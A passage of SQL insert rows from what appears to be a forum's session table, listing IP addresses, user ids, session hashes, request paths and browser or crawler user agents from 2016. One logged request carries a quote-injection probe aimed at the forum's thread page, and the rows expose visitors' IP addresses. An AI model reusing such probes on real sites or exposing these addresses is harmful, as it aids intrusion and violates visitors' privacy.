('be6a825661d4570645cbc2bdc2de04ad', 0, '172.68.10.251', '1cdec744e0021f786579632f39b2cf4a', 1465902919, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('be1b0f50193f700d39bbbcf4c50331df', 0, '172.68.34.91', '37a60411c341250cf0113f4eba911963', 1470278085, '/converse.php?u=178&u2=277', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('71ff5df151e7706052a7a4cae1dd93b4', 0, '172.68.10.251', 'eb30fefcb15bfdb84ec49e2fabd5c1d1', 1465903975, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('de345de4d1ce56269d493dfdbd3a228c', 0, '42.117.70.187', 'dc5441dd8b92720f5713f49f046bbb6a', 1465905401, '/register.php', 'Mozilla/5.0 (Linux; Android 4.4.2; SM-T230NU Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) co', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('59db05ea2e14f9e3adf59d8255336b32', 161, '172.68.29.181', '69ded3bf64c4ca2f3b17ba59eb1334d0', 1465905483, '/search.php?do=getnew', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('b84a69db476a12df2a66720248aac54a', 0, '94.202.81.205', 'ca1d6524fb59af616dbe5048b9b0a91d', 1465906485, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('612530560bc07d64c416d8b6b385b883', 0, '172.68.10.241', '9ac79b70475fda4ce46f7157faf70fad', 1465907099, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.5.2526.111 Amig', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bd5c812b55a9efe10dd6a1edf41da65e', 0, '172.68.34.48', '37a60411c341250cf0113f4eba911963', 1470264753, '/archive/index.php/t-2353.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('e2e2aea23b027a778d1824a4d296c680', 0, '172.68.34.83', '37a60411c341250cf0113f4eba911963', 1470267184, '/index.php?langid=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cbbb45c2bc2f749fe64f319a7d0ff019', 0, '172.68.34.59', '8c2a58ed4130be298d50116da95b8cf5', 1469597119, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('c379d87f813a790defaf906f8ea7e9ea', 0, '185.93.182.134', '001757a03b02135190a9b97a51387804', 1465911717, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 YaB', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('48b95ec33a244ff466494a7f88a4f3c5', 0, '168.1.75.23', '4bc5659a2cf9f6262fe4ba44c935815c', 1465912176, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b9f22c454e06a977741afdd8311ab449', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465916251, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('4e2e2bbdc1091ad512a4dec01ade352c', 0, '2a02:598:a::78:', '9c4b0c69d5bacbfc0b2b16c22bbbc0ef', 1467517294, '/faq.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a347d47d17c662e2d21eade0d06ab487', 0, '207.46.13.16', '5e207e311e22cdc3b2095126a922fa93', 1468259972, '/showthread.php?t=1835', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('47f1939958347fb6de90324805089da0', 0, '187.158.110.214', '1a44cc162acce455206563933a3fab8f', 1466183314, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ad2d22e7935bba771585998194795ff8', 0, '172.68.11.240', '89e1c7d33ca359d1f2adad850480db46', 1465932212, '/showthread.php?p=2956\'A=0', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('67c20cd9b751afec6ef33105f06b714a', 0, '93.115.95.205', '222188c6de00cd68dcf8273befb44d9d', 1465938008, '/memberlist.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0c2412f7d759b5303b9b0c935d7f3540', 0, '66.249.66.173', 'b4343dffbdc847519606d6eb72cdaefd', 1466663291, '/showthread.php?t=2318', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('081ab9d1e7420ca6696b75d38c49b277', 0, '2a02:598:2::169', 'fddfb74950afb4dc22391b1106698b72', 1467589902, '/memberlist.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('12e6cc338d53be4b506edb8513a7f2b4', 0, '223.176.171.79', '47478e0e6c258499b53f1f6e0c372bbc', 1465941665, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('eee945db4c49cb025d19ddd63d333f78', 0, '95.49.75.219', '9fe0e57c49df4064de6f4078dc8746c6', 1465941538, '/showthread.php?p=3045', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e8322165c94d5a8ecb4ca5a5ca145032', 0, '5.28.62.85', '8884c177094e021f6a1c523cc7b3171e', 1465945907, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1675e28f17589286febe7ad775d56535', 0, '198.55.115.24', '3decd89e3fdf2dcb3fff38b1eec9f00a', 1465946593, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('61ea5e10b46d56cfeef35c2d208de40d', 0, '212.252.153.51', 'a34878407353f959d63fc19b04fcd9ea', 1465947212, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('59ce091bc9dca34831497e9729671a8c', 0, '178.217.208.3', 'fcc5274ed7eb1d7770b5a570aacc2e7d', 1465947480, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7c84c4b82c331f5b60caeb5bda7f182c', 0, '172.68.11.201', 'd7fe3b3ac36f8711b366eb4d2bb7ce49', 1465947692, '/index.php', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bbd8da43c1af90bf0d436b2bfb460d7f', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465948044, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('3366cea23923ab205a5a3578e93bcb0d', 0, '93.115.95.202', '222188c6de00cd68dcf8273befb44d9d', 1465951381, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fb2d185eb7058ac5901323d50ff68524', 0, '196.196.34.119', '5208b84e4b4cc1cc24285ae653118845', 1465951719, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/36.1.1.21 Chrome/36.0.198', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6634a41a6e2146c719eff12a0f1abd0e', 0, '66.249.66.179', 'b4343dffbdc847519606d6eb72cdaefd', 1467963141, '/showthread.php?p=2786', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8b14c11ee18e19d0b2d683a437648f7a', 0, '157.55.39.39', '23f3103f44bc3badcba53554e5e4cb6d', 1465956219, '/showthread.php?p=3017', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8f430a7957c9b502bd1c70bbac019fcb', 0, '157.55.39.190', '23f3103f44bc3badcba53554e5e4cb6d', 1465956240, '/misc.php?do=bbcode', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e19b20bb1a4e5d753b0aed02965f85d3', 240, '172.68.10.246', '8fa9bfbb2231b423cd3de0abccee36f4', 1465956609, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/537.26 (KHTML, like Gecko) Chrome/31.0.20', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('ceed14ea75c8a6827a168cb13a8771e2', 240, '172.68.10.246', '8a4c6f837838635eb0d0707c100be7c5', 1465956614, '/usercp.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/537.26 (KHTML, like Gecko) Chrome/31.0.20', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('9d5b019b3cdecc770487ef8e7a82b61c', 240, '172.68.10.246', 'd7735cb1aa2660070e6bd77846cd3c16', 1465956615, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/537.26 (KHTML, like Gecko) Chrome/31.0.20', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('fc0997a3aaf0dc9d0f14eee47408a154', 0, '2a02:598:a::79:', 'cb15990151cd6a966ad7e135ddf34976', 1465956707, '/forumdisplay.php?f=32', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6c63f444a51f020eda81e61ae05719e2', 0, '78.95.88.66', '884bba37a8b03d494a0c005f1fdabfe4', 1465957114, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('68b2d8546f052cc8a81a49054bdf29c0', 0, '185.43.191.109', '6cc350eb4ca2753f97cd21eccc0dfc91', 1465964204, '/memberlist.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 UBro', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d1e85b2ec57968d51ca3996692db913c', 0, '77.81.104.124', '46689dc1917f93cb681e7bd68cd554fa', 1465969153, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('dc52188c9e2e11cd6b4f9319fe877028', 0, '66.87.119.166', '757d645d6c559767269f9b7aef026f18', 1465971734, '/index.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Ver', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('92740f2ccc1fade851d55edf4461ad5c', 0, '2a02:598:2::103', 'b49d4935b73f3745d58433a0511d8a13', 1474482469, '/forumdisplay.php?f=32', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b5372a11f3304b145f432bad68d39b11', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465980304, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('5657b3bafb44bdb79e6834d8d30d0c82', 161, '54.233.145.152', '69ded3bf64c4ca2f3b17ba59eb1334d0', 1465983394, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('4ca5ae495bc2484b725977812d9a428c', 0, '2a02:587:4d05:6', 'ccb7ff3050740eb39963120bb128ed07', 1465983490, '/memberlist.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('73b08ef494428cad7bf219824efffe44', 0, '82.102.99.247', 'd88172e4f4071f81f91c8d6586a7f0f1', 1465983783, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('049421aa1bf43d6085afb0d2ec342fc4', 0, '37.6.123.211', '61749a1c0766471caf79b550f057aa87', 1465984184, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b4fbc75289510bb710180f578cdf5043', 0, '100.43.91.20', '93ab97da9dc26f9bfa5e70cf3f4ccafc', 1471440435, '/showthread.php?p=2956', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('67b7124889a0b77b59a113721b7e2128', 0, '100.43.81.131', 'b40eb992e4ed4c9574976a2678dedecd', 1475337000, '/forumdisplay.php?f=32', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ca2efb510f7515ae78ad326c41d06c0a', 0, '62.102.148.183', 'eb1f694994b43b7e720178a85a3d6f31', 1465989297, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a56b7dff1edaa09f3ca130fb117ee4e8', 161, '54.233.145.152', '69ded3bf64c4ca2f3b17ba59eb1334d0', 1465990598, '/search.php?do=getnew', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('7c1c9a56acc8af0aeb21079685af062f', 0, '2a02:598:a::79:', 'a787c69b08e3fdd17bd97ea30bdaed83', 1469221010, '/faq.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('98f753df28b47cfb89def50a8cf970c2', 0, '157.55.39.97', '23f3103f44bc3badcba53554e5e4cb6d', 1465994773, '/printthread.php?t=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('834eaf3f1f35d2580c1c8c1531f811f9', 0, '64.120.18.134', '910f052cd34d328e273f52b2e9d33999', 1465994955, '/index.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 AskTbGLSV5/3.9.1.14019 F', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6eec74d225802c475b120e509bc7786c', 161, '54.169.91.242', '03e844f907bd105a062d3775655475d8', 1465995870, '/search.php?do=getnew', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('8b8852363c04c21b5b363873912a42f6', 0, '172.68.34.58', '37a60411c341250cf0113f4eba911963', 1470270086, '/member.php?u=338', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('06306d530904b9f3223b570086ba546c', 0, '176.96.162.72', '0da41661bc23ce8ba9c9bc713feb29d2', 1465998640, '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('254186182b673cd9987b774c2ae6b13d', 0, '105.108.198.28', '707ad2a30cdb08faa03c1edaa5cf83dd', 1466006833, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2756.0 Safari/537', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0241b7d6324443d8ad9fdb859aeba520', 0, '172.68.34.93', '37a60411c341250cf0113f4eba911963', 1466032810, '/archive/index.php/t-1151.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('3bb925e220ecbacd7ef34eb4dacad152', 0, '212.117.170.192', 'b4913f8df3fa8227ea948d6dbfb79d6d', 1466002151, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3d63b6d7f82107b2bad7c0fc14cda319', 0, '91.109.201.7', '8b2fea48444036e59843cda1d294288e', 1466002187, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('35df0d93502cb94f041a9384feabf66b', 0, '82.123.238.84', '13d1166dbd8e5dec7ee104f65c5c35db', 1466002406, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0b91ee62427d283d5a975c8ad3055c4c', 0, '88.12.19.198', '056b399089e7a1bc5311e14bbcebf3a3', 1466002454, '/showthread.php?t=1030', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5c7ace713fb963760e09d5760e553c63', 0, '176.31.45.172', '9729c53a9b33b428c086b058b7826f59', 1466003799, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/36.1.1.21 Chrome/36.0.198', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('80c1f1dae0b477c9255e09062da7b913', 0, '5.34.244.134', 'ec31290f0b19d6a956ffa802844098b5', 1466003800, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/36.1.1.21 Chrome/36.0.198', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('16427d53b88d2098b68fe07afa7ea57b', 0, '172.68.34.59', 'a938925ca9403f145c82d10ebc1ecbe1', 1470299411, '/archive/index.php/t-2396.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('46511c10a644a31e0cdeba3b596dc8fc', 0, '109.11.219.174', 'fc54863a6c9b6b3addbb9746ce642fd7', 1466006541, '/index.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_0 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Versi', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9c09e725a1a8ec5da47acaff4cf5daa8', 0, '169.0.187.111', '8eb716b40b8c08e428dba0be28731241', 1466006885, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0641c0046478bbb717d333a0edec7f16', 0, '92.0.64.30', '63bff08efee20eb6dbc1f33fb24d5bb3', 1466007826, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7c88d63de929f468d058cf8a069ddb52', 0, '169.0.187.111', '5d5794930f698d821daaf2a0c9e8c54a', 1466009551, '/index.php', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('23b16f603323d690b47bbfd7fc2ad8a6', 0, '106.215.161.72', '7bee3cc1f6c0aa6c1f22b60f1f8785e0', 1466009583, '/register.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9fbe23205a1d3a7ab45d547a3dd5bd1d', 0, '165.117.254.250', '1f4c1ae56376ec58834c8624ba56bba7', 1466009771, '/converse.php?u=33&u2=277', 'Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('755574da3db7f554e06c676eabbdfb12', 0, '81.12.134.6', '288bc6b2833c52075d69cbe7585f43df', 1466010308, '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('75879129d18bf52337a8895f4186b80f', 0, '92.222.38.67', '24e0dad20cf66927f10f21ee1bf6feaa', 1466011156, '/index.php/favicon.ico', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('016b845239b939e97cd85f5fc1aff899', 0, '2a02:598:a::79:', '75872da10fcb21eb5284a458a4bc30d8', 1469206496, '/memberlist.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ab4ca3b3216dc84a9b5e5786c86bef41', 0, '164.132.51.91', '0737270de8f294fcb7dd6012c6ae387f', 1466011379, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('db2d9f89925678610a4acf93d687fe62', 0, '172.68.34.49', '37a60411c341250cf0113f4eba911963', 1470280749, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f07fc939626e8d7e26fb72e09342e5fe', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466013189, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('a41dc9d7ceb27ae99ae978006345ec18', 0, '213.136.255.37', '49072821f6766d301ccb92c272890aab', 1466013905, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.8.2000 Chrome', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6ec152fc49669d2e905ede7f142483c2', 0, '109.202.107.10', '100d5ceae4c7dd70efc112218b5235a5', 1466014416, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1d31144f226ebc639da4c8e79d7bf1e1', 0, '128.72.221.218', 'aa9167e2eba97b77a0bb370d60c91f93', 1466017565, '/index.php', 'Mozilla/5.0 (iPad; CPU OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('dfce836630b16833d7869eefa4589330', 0, '172.68.10.200', 'f1eca1b336dd2f9f4bd9574e650603e4', 1466019876, '/showthread.php?p=2258', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1379ac6e86394d49291a7b007a9b14bb', 0, '172.68.34.81', '37a60411c341250cf0113f4eba911963', 1470284754, '/search.php?searchthreadid=2463', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8e8ed9ad91b4a2df71dae39c2c5b4ab4', 0, '172.68.34.59', '37a60411c341250cf0113f4eba911963', 1470266091, '/misc.php?do=showsmilies&langid=1', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 1, 0, 0, 0, 0, 2, 0, 0),
('cae0ac6342caf8b5654bb9ca615e2a89', 0, '178.233.135.81', '7626cec8814b65c45c1156271990b981', 1466020746, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3e9df7893eb164915c17ab2ae1bd3dbf', 0, '207.46.13.62', '5e207e311e22cdc3b2095126a922fa93', 1466022246, '/showthread.php?p=2933', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8985b19c00481b37d473b353233463dc', 0, '172.68.34.83', '8c2a58ed4130be298d50116da95b8cf5', 1469590974, '/showthread.php?p=2315', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c099bcb7e202912a17952de52ddd019f', 0, '2a02:598:a::78:', '2e3a6fac6be895e4b2cd5476b8447a57', 1470264840, '/login.php?do=lostpw', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('85fe39832bf27920216932315ddd6bb3', 0, '172.68.34.50', '8c2a58ed4130be298d50116da95b8cf5', 1466598625, '/archive/index.php/t-1857.html', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('477e270f56516af7f2593d1f070e4103', 173, '216.164.19.30', '67765547f4c9d87ff4d5314c961e669d', 1468300007, '/index.php', 'Mozilla/5.0 (Linux; Android 4.4.2; Device/sch-i535; RoboForm-A/4.2.9;) AppleWebKit/537.36 (KHTML, li', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('5904b7b9afe7149d75680c92d4e61349', 0, '172.68.34.47', '37a60411c341250cf0113f4eba911963', 1470269406, '/forumdisplay.php?f=35', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1d6181897819cf1205f26e36415be4fc', 0, '124.120.158.60', 'f0077a4c5d01b8d4da1a5ebfc0034b1b', 1466031490, '/register.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
